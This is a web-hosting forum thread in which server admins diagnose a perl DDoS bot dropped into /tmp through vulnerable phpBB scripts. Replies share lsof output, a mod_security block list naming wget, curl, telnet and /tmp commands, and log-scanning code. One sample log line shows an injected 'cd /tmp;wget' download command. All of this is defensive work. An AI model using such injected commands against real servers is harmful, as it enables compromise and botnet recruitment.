DDOS Attacks from my Server ...need help

Higgins

Well-Known Member
Jan 31, 2003
82
0
156
Since today we have DDoS attacks coming from our server. It starts with a simple wget.pl file in the /tmp dir, then we can see many perl processes and the attack starts. The wget.pl file is owned by nobody, but when I grep in the domlogs for "wget" or "tmp" or whatever, I couldn't find anything.
During the attack I ran lsof | grep PID and got:

perl 6839 nobody cwd DIR 8,1 4096 2 /
perl 6839 nobody rtd DIR 8,1 4096 2 /
perl 6839 nobody txt REG 8,1 15468 1159004 /usr/bin/perl
perl 6839 nobody mem REG 8,1 3380065 1224141 /usr/lib/perl5/5.8.1/i386-linux-thread-multi/CORE/libperl.so
perl 6839 nobody mem REG 8,1 105725 1191483 /usr/lib/perl5/5.8.1/i386-linux-thread-multi/auto/Socket/Socket.so
perl 6839 nobody mem REG 8,1 101264 1763195 /lib/tls/libpthread-0.60.so
perl 6839 nobody mem REG 8,1 24848 783389 /lib/libcrypt-2.3.2.so
perl 6839 nobody mem REG 8,1 93028 783378 /lib/libnsl-2.3.2.so
perl 6839 nobody mem REG 8,1 19984 783388 /lib/libnss_dns-2.3.2.so
perl 6839 nobody mem REG 8,1 52784 783377 /lib/libnss_files-2.3.2.so
perl 6839 nobody mem REG 8,1 107724 783468 /lib/ld-2.3.2.so
perl 6839 nobody mem REG 8,1 1578228 1762584 /lib/tls/libc-2.3.2.so
perl 6839 nobody mem REG 8,1 16312 783517 /lib/libdl-2.3.2.so
perl 6839 nobody mem REG 8,1 213244 1762587 /lib/tls/libm-2.3.2.so
perl 6839 nobody mem REG 8,1 78048 783520 /lib/libresolv-2.3.2.so
perl 6839 nobody mem REG 8,1 14116 783518 /lib/libutil-2.3.2.so
perl 6839 nobody mem REG 8,1 135788 97965 /usr/lib/perl5/5.8.1/i386-linux-thread-multi/auto/IO/IO.so
perl 6839 nobody mem REG 8,1 33513072 1207911 /usr/lib/locale/locale-archive
perl 6839 nobody 0r CHR 1,3 34183 /dev/null
perl 6839 nobody 1w FIFO 0,5 91861346 pipe
perl 6839 nobody 2w FIFO 0,5 91861346 pipe
perl 6839 nobody 3u IPv4 91861354 TCP myserver.tld:40347->victimip:domain (ESTABLISHED)
perl 6839 nobody 4u REG 7,0 0 28 /tmp/ZCUDNcdkME (deleted)
perl 6839 nobody 5w FIFO 0,5 91846064 pipe
perl 6839 nobody 6r FIFO 0,5 91846065 pipe
perl 6839 nobody 7u unix 0xe83a0c00 91860371 socket
perl 6839 nobody 8r FIFO 0,5 91846066 pipe
perl 6839 nobody 9u IPv4 91860382 TCP myserver.tld:40345->srv03.victimsserver:http (CLOSE_WAIT)
Also I have APF installed, but it does not block these attacks. So I have no clue how this file gets into the tmp directory as user nobody, and I couldn't find it in the logs.

Can anyone please help me out?
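As an added example (not part of the original thread), the following Python script parses lsof output shaped like the lines above and flags PIDs that combine the two indicators visible in this post: a deleted file still held open under a temp directory and an outbound TCP connection, both under the web server user. The sample lsof lines, PID numbers and user list are constructed for the example.

```python
import re

# Users the web server runs as on cPanel/Apache boxes; adjust for your setup.
WEB_USERS = {"nobody", "apache", "www-data"}
# World-writable directories that the scripts in this thread were dropped into.
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample shaped like the lsof output posted above. PID, user and
# host names are placeholders, not data from any real server.
SAMPLE_LSOF = """\
perl 6839 nobody txt REG 8,1 15468 1159004 /usr/bin/perl
perl 6839 nobody 3u IPv4 91861354 TCP myserver.tld:40347->victimip:domain (ESTABLISHED)
perl 6839 nobody 4u REG 7,0 0 28 /tmp/ZCUDNcdkME (deleted)
perl 6839 nobody 9u IPv4 91860382 TCP myserver.tld:40345->srv03.victimsserver:http (CLOSE_WAIT)
httpd 1200 nobody txt REG 8,1 292000 1160000 /usr/local/apache/bin/httpd
httpd 1200 nobody 3u IPv4 1000 TCP *:http (LISTEN)
mysqld 900 mysql 5u unix 0xe83a0d00 2000 /tmp/mysql.sock
"""


def parse_lsof(text):
    """Split each lsof line into command, pid, user, fd, type and the remainder.

    The remainder (DEVICE, SIZE/OFF, NODE, NAME) has a variable number of
    fields: socket lines omit SIZE/OFF and NAME may contain spaces such as
    "(deleted)", so it is kept as one string and interpreted per type later."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 6 or not parts[1].isdigit():
            continue  # header line or something we do not understand
        cmd, pid, user, fd, ftype, rest = parts
        rows.append({"cmd": cmd, "pid": int(pid), "user": user,
                     "fd": fd, "type": ftype, "rest": rest})
    return rows


def profile_pids(rows):
    """Group rows by PID and collect the two indicators seen in the thread:
    an open-but-deleted file under a temp directory, and an outbound TCP
    connection (any state other than LISTEN)."""
    profiles = {}
    for r in rows:
        p = profiles.setdefault(r["pid"], {"cmd": r["cmd"], "user": r["user"],
                                            "deleted_tmp": [], "outbound": []})
        if r["type"] == "REG":
            fields = r["rest"].split(None, 3)  # device, size, inode, name
            if len(fields) == 4:
                name = fields[3]
                if name.endswith(" (deleted)"):
                    path = name[: -len(" (deleted)")]
                    if path.startswith(TMP_DIRS):
                        p["deleted_tmp"].append(path)
        elif r["type"] in ("IPv4", "IPv6"):
            m = re.search(r"(\S+)->(\S+)\s+\((\w+)\)", r["rest"])
            if m and m.group(3) != "LISTEN":
                p["outbound"].append("%s->%s (%s)" % m.groups())
    return profiles


def suspicious_pids(profiles):
    """PIDs owned by a web-server user that show both indicators at once."""
    return sorted(pid for pid, p in profiles.items()
                  if p["user"] in WEB_USERS and p["deleted_tmp"] and p["outbound"])


if __name__ == "__main__":
    # On a live box: lsof -nP | python3 this_script.py   (reads stdin)
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LSOF
    profiles = profile_pids(parse_lsof(text))
    for pid in suspicious_pids(profiles):
        p = profiles[pid]
        print(f"PID {pid} ({p['cmd']}, user {p['user']}):")
        for path in p["deleted_tmp"]:
            print("  deleted file still open:", path)
        for conn in p["outbound"]:
            print("  outbound connection:   ", conn)
```

A deleted-but-open file under /tmp is worth keeping in mind when cleaning up: the script is gone from the directory listing, but its contents can still be read through /proc/PID/fd/N while the process lives, which is the place to grab a copy before killing it.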
 

DigiCrime

Well-Known Member
Nov 27, 2002
399
0
166
Did you run this?

for files in /usr/local/apache/domlogs/*; do grep "wget" "$files"; done;

I take it the attack is outgoing? Or is it incoming?
 

chirpy

Well-Known Member
Verifed Vendor
Jun 15, 2002
13,466
31
473
Go on, have a guess
It's most likely to be a vulnerable php script on the server and the most likely vulnerable app these days is either phpBB or phpNuke. You should install WHM > Addon Modules > Addon Script Manager > refresh your browser and scroll down on the left to the bottom and click on Addons > Addon Script Manager and force update any phpBB, and if installed phpNuke, installations. You should also look at installing mod_security either through WHM or manually and add a good set of secfilter lists (search the forums for mod_security).
 

DigiCrime

Well-Known Member
Nov 27, 2002
399
0
166
Was just gonna suggest mod_security. I don't think that Addon Manager works for those who installed phpBB using their own method; if installed by the cPanel script it'll find it, but not 100% certain.


For Apache 1 here's what I use:

wget http://www.modsecurity.org/download/modsecurity-1.8.7.tar.gz;tar -zxf modsecurity-1.8.7.tar.gz;cd mod*;cd apache1;/etc/httpd/bin/apxs -cia mod_security.c;pico /usr/local/apache/conf/httpd.conf;service httpd restart

In httpd.conf, put this in:

Code:
<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine On

# Change Server: string
SecServerSignature "Apache"


# This setting should be set to On only if the Web site is
# using the Unicode encoding. Otherwise it may interfere with
# the normal Web site operation.
SecFilterCheckUnicodeEncoding Off

# The audit engine works independently and
# can be turned On or Off on the per-server or
# on the per-directory basis. "On" will log everything,
# "DynamicOrRelevant" will log dynamic requests or violations,
# and "RelevantOnly" will only log policy violations
SecAuditEngine RelevantOnly

# The name of the audit log file
SecAuditLog logs/audit_log

# Should mod_security inspect POST payloads
SecFilterScanPOST On

# Action to take by default
SecFilterDefaultAction "deny,log,status:403"

## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ##

# Require HTTP_USER_AGENT and HTTP_HOST in all requests
# SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

# Require Content-Length to be provided with
# every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"

# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

# phpBB filter 
SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"

# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
# Block remote file inclusion through p= / page= (no trailing space in the
# pattern, otherwise "http://..." would never match)
SecFilterSelective ARG_p|ARG_page "^(http|https|ftp):/"
SecFilterSelective THE_REQUEST "cd /dev/shm "
SecFilterSelective THE_REQUEST "/usr/bin/gcc "

</IfModule>
In the meantime, delete everything in /tmp besides your mysql.sock file; maybe reboot the system to freshen everything up.
 
May 20, 2005
8
0
151
Somebody has a PHP script which creates the wget.pl file and runs it as nobody. The easiest solution to this would be to rebuild Apache to support php suexec so that PHP scripts get executed as the user who owns them instead of "nobody". This increases security overall and helps you track down such scripts.

Other than that, the only solution I can think of is to check the creation date of wget.pl and check your Apache logs for that time.
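Following the advice above (take the file's timestamp and look at the Apache logs around it), here is an added Python example that is not from the thread: it pulls domlog entries within a few minutes of a file's mtime and tags each one with the indicators the mod_security list earlier in the thread looks for, after URL-decoding the request target. The log lines, hosts, times and the file mtime are constructed for the example; on a real box the mtime comes from os.stat(path).st_mtime.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Constructed domlog lines in Apache common log format. Hosts, paths and times
# are placeholders invented for this example, not entries from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [20/May/2005:14:01:12 +0000] "GET /forum/index.php HTTP/1.1" 200 5120
198.51.100.7 - - [20/May/2005:14:03:40 +0000] "GET /forum/viewtopic.php?t=1&highlight=chr(119)chr(103) HTTP/1.1" 200 310
198.51.100.7 - - [20/May/2005:14:03:55 +0000] "GET /forum/viewtopic.php?t=2&highlight=cd%20/tmp%3Bwget%20http://example.invalid/wget.pl HTTP/1.1" 200 310
203.0.113.9 - - [20/May/2005:16:30:00 +0000] "GET /index.php?page=http://example.invalid/x.txt HTTP/1.1" 200 100
"""

# Stand-in for the dropped file's mtime; on a real box use
# datetime.fromtimestamp(os.stat(path).st_mtime, timezone.utc).
FILE_MTIME = datetime(2005, 5, 20, 14, 4, 10, tzinfo=timezone.utc)

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# The same indicators the mod_security list in this thread looks for, applied
# to the decoded request target rather than the raw log line.
INDICATORS = {
    "download tool":            re.compile(r"\b(wget|curl|lynx|ftp|scp)\s"),
    "cd into temp dir":         re.compile(r"cd\s+/(tmp|var/tmp|dev/shm)\b"),
    "phpBB chr() in viewtopic": re.compile(r"viewtopic\.php\?.*chr\(\d{1,3}\)"),
    "remote URL in p/page arg": re.compile(r"[?&](p|page)=(https?|ftp):/"),
}


def parse_line(line):
    """Return ip, time (aware datetime), method, target, status for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    return {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "target": target, "status": int(status)}


def decode_target(target):
    """URL-decode repeatedly (double encoding is a common filter-evasion trick);
    a plain grep for "wget " on the raw log misses "wget%20" entirely."""
    for _ in range(3):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def indicators(target):
    """Names of the INDICATORS that match the decoded request target."""
    decoded = decode_target(target)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def requests_near(log_text, file_mtime, window=timedelta(minutes=5)):
    """All requests within +/- window of the file's mtime, each tagged with the
    indicators it matched (an empty list means nothing obvious, still worth a look)."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and abs(entry["time"] - file_mtime) <= window:
            entry["indicators"] = indicators(entry["target"])
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for e in requests_near(SAMPLE_LOG, FILE_MTIME):
        flag = ", ".join(e["indicators"]) or "-"
        print(f'{e["time"]:%H:%M:%S} {e["ip"]:<15} {e["method"]} '
              f'{decode_target(e["target"])}  [{flag}]')
```

The window matters more than the indicator list: the request that wrote the file is usually within seconds of its mtime, and the same client IP tends to show up on the preceding probe requests too, so once a hit is found it is worth pulling every line for that IP.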
 

AndyReed

Well-Known Member
PartnerNOC
May 29, 2004
2,221
4
193
Minneapolis, MN
Just in case you recompile Apache with phpsuexec, you'll need to chmod 755 all PHP scripts in the /home directory. Otherwise, PHP scripts won't work.
 

wa4fat

Well-Known Member
Dec 30, 2001
51
1
308
My server is apparently also under attack

I have been experiencing an apparently similar DDoS attack recently, which consumes all my server's resources and eventually (if undetected) brings the box down. A tell-tale file in the /tmp directory is the only evidence I've been able to locate, and a Google of the text in this file points to a few mentions of DDoS code, either via IRC or through some exploit in phpBB. A sample of the wording in this file includes:

Password too long!
Disable sucessful
Removed all spoofs
What kind of subnet address is that? Do something like: 169.40
NOTICE %s :TSUNAMI <target> <secs>

I'd be grateful for any suggestions as to what you might do to prevent this from occurring, or to locate the source.

Thanks very much in advance!
 

AndyReed

Well-Known Member
PartnerNOC
May 29, 2004
2,221
4
193
Minneapolis, MN
You'll need to secure your server. The problem I see with many people, including our clients, is that they won't secure their servers, either out of ignorance, or because they don't know how, or because they don't want to spend money on hiring a company to secure their servers. The vast majority of clients come to us screaming for help after the damage has been done to their servers.

I suggest you search this forum and find threads discussing security issues.
http://forums.cpanel.net/search.php?searchid=577414
http://forums.cpanel.net/search.php?searchid=577415
 

GordonH

Well-Known Member
Sep 6, 2001
104
0
316
The cPanel advanced guest book script is the most commonly exploited script we have to deal with. It will accept character substitution hacks allowing people to write files to other locations in the account.
It's popular with phishing scammers for getting their HTML into your accounts.

We would prefer to have the ability to stop the guest book appearing in cpanel but I am not going to edit the skin on 100+ servers.
 

ehsan

Well-Known Member
Dec 11, 2001
185
0
316
We had a similar problem on one of the servers too!
The problem was phpBB again! This time I found out the WHM Addon Script Manager doesn't update all phpBB installations! Well, I guess it shouldn't be responsible for manual installations anyway! But I think it only detects /forum folders....

In our case the hacker was overflowing eth0.
The hacker wrote these files to /tmp using phpBB:

.\ .\ ./ a2.pl cof.txt log.txt ret.pl ses sesions theme_info.cfg udp.pl

Notice that the first one is a folder name: . . .

Well, I was lucky that my cron job found them :) and I was able to get on top of it right away...

Anyway, a new version of phpBB is out (.15) but cPanel still installs .13.

I have the source to his files; does anyone know where I can send these files to help prevent the same problem for others?
 

GordonH

Well-Known Member
Sep 6, 2001
104
0
316
On a related issue, this is why I will not use Fantastico.
It would be very bad if there were exploits of the scripts it installed, as we would have to patch all the sites manually.
 

ehsan

Well-Known Member
Dec 11, 2001
185
0
316
someone sent me a pm about the script, here is the code:
full article can also be found at:
http://www.myserver.us/articles/checking-server-for-hackers-sample-script-tmp-directory-check.html


Code:
#! /usr/bin/perl

###################################################################
# Author: Mohammad Ranji
# Script will check into XXX directory to see
# if there is any file that has YYY keyword in it
# this is useful to find possible hacks for example
# perl files in /tmp
# for full article visit
# http://www.myserver.us/articles/checking-server-for-hackers-sample-script-tmp-directory-check.html
###################################################################

use strict;
use warnings;

#########################################################
###################### CONFIG #############################
#########################################################

#this is used to send email
#if you don't have this module comment this part out
#and set send_email=0
use MIME::Lite;

my $send_email = 1;                        #change to 0 if you want to disable sending emails
my $to         = "your-pager\@domain.com"; #dont forget \@ instead of @
my $from       = "you\@domain.com";
my $mailserver = "mail.example.com";
my @what       = ("perl", "#!/bin/");      #add more keywords to look for if needed
my $lookin     = "/tmp";                   #directory to look into
my $script_location = "/checktmp/";        #where is this script? (log files are written here)

#########################################################
#################### END CONFIG #########################
#########################################################

# "chdir $dir || die ..." parses as chdir($dir || die ...) and can never fail,
# so the low-precedence "or" is needed here
chdir($script_location) or die "Can't cd to $script_location: $!\n";

foreach my $keyword (@what) {
    # -R recurses into $lookin; the pattern is single-quoted so the shell does
    # not treat "#!/bin/" as the start of a comment. Each output line is
    # "file:matching text".
    my @files = `grep -R -- '$keyword' $lookin`;
    chomp @files;
    foreach my $line (@files) {
        found($keyword, $line);
    }
}

sub found {
    my ($what, $where) = @_;

    #lets log what we found into a file first
    #the file is named after today's date, e.g. 2005-05-20.log
    my $file = `date '+%F'`;
    chomp $file;
    $file =~ s/ /_/g;      #replacing all spaces with _ if any exists
    $file .= ".log";

    #">>" creates the file if it does not exist, so no separate create step is needed
    open(my $log, ">>", $file) or die "Cannot open $file: $!";

    my $date = `date`;
    chomp $date;
    print $log "$what was found in $where at $date\n";
    close($log);

    my $subject = "Alert";
    my $message = "$what was found in $where at $date.";

    #should we email what we found?
    email($to, $from, $subject, $message) if $send_email == 1;
}

sub email {
    # get incoming parameters
    my ($to, $from, $subject, $message) = @_;

    # create a new message
    my $msg = MIME::Lite->new(
        From    => $from,
        To      => $to,
        Subject => $subject,
        Data    => $message,
    );

    # send the email through $mailserver
    MIME::Lite->send('smtp', $mailserver, Timeout => 60);
    $msg->send();
}
 

chirpy

Well-Known Member
Verifed Vendor
Jun 15, 2002
13,466
31
473
Go on, have a guess
GordonH said:
The cpanel advanced guest book script is the most commony exploited script we havbe to deal with. It will accept character substitution hacks allowing people to write files to other locations in the account.
Have you informed cPanel about this? I.e. logged it in Bugzilla and emailed [email protected]?
 

ehsan

Well-Known Member
Dec 11, 2001
185
0
316
Why do I need to update the cPanel installation when it is supposed to fetch the update from the cPanel server for add-ons? Especially when I use the add-on update module?
 

chirpy

Well-Known Member
Verifed Vendor
Jun 15, 2002
13,466
31
473
Go on, have a guess
It entirely depends on what version of cPanel you are running. If it's pre-10.0.something then it's old, insecure, and running the old update system, and you should upgrade it to the current tree of your choice. If it's newer than that, then what version are you running and what do you have set for each of the options under WHM > Update Config?